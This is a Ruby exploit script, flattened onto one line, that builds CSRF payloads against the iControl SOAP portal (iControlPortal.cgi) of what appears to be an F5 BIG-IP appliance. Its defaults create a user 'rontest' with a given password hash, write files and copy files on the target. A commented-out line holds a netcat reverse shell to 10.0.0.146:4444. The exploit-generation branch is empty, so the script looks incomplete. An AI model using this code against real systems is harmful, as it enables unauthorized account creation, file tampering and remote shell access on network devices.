require 'httparty' require 'base64' def usage() $stderr.puts "ruby #{ $0 } [username:password]" exit end TARGET = ARGV[0] || usage() TARGET_URL = "https://#{ TARGET }/iControl/iControlPortal.cgi" TEMPLATE_FILE = ARGV[1] || usage() begin TEMPLATE = File.read(TEMPLATE_FILE) rescue StandardError => e $stderr.puts "File not found: #{ TEMPLATE_FILE }" $stderr.puts usage() end ACCOUNT = ARGV[2] if ACCOUNT $stderr.puts "NOTE: You've provided a username and password, which means this is going" $stderr.puts "to authenticate, and therefore isn't an exploit" $stderr.puts $stderr.puts "Don't enter a username:password if you want to generate a CSRF exploit!" end # Set up some defaults DEFAULTS = { 'FILENAME' => '/tmp/csrfdemo.txt', 'BASE64FILEDATA' => 'SGVsbG8gd29ybGQh', 'USERNAME' => 'rontest', 'FULLNAME' => 'Ron Test', 'CRYPTSHA512HASH' => '$6$T2mT4PeYSuyg/hSr$y/rN9tol5t1fRxTBqFVtxLzRfUBXt16yNahqYTaVVZa3PITfoAKBnuzqvwBT77qNBV4JjgwdhzqmsMk78bo6d0', # "Password1" 'FROM_FILENAME' => '/tmp/file1', 'TO_FILENAME' => '/tmp/file2', } #COMMAND = "nc -e /bin/bash 10.0.0.146 4444 2>&1 > /dev/null &" DELAY = 1000 # Fill in the template REQUEST = TEMPLATE.gsub(/%%%[a-zA-Z0-9_]+%%%/) do |var| var.gsub!(/%/, '') $stderr.print "Value for #{ var } [#{ DEFAULTS[var] }]: " $stderr.flush val = $stdin.gets&.chomp if !val || val.length == 0 val = DEFAULTS[var] end val end if ACCOUNT $stderr.puts "Sending the following payload directly to #{ TARGET }..." $stderr.puts $stderr.puts REQUEST response = HTTParty.post( TARGET_URL, verify: false, headers: { authorization: Base64::encode64(ACCOUNT), 'content-type': 'text/xml', }, body: REQUEST ) $stderr.puts $stderr.puts "Response:" $stderr.puts response $stderr.puts $stderr.puts '---' if response.body =~ /(error_string.*)/ $stderr.puts "Something went wrong:" $stderr.puts $stderr.puts $1 exit 1 end else puts %{ } end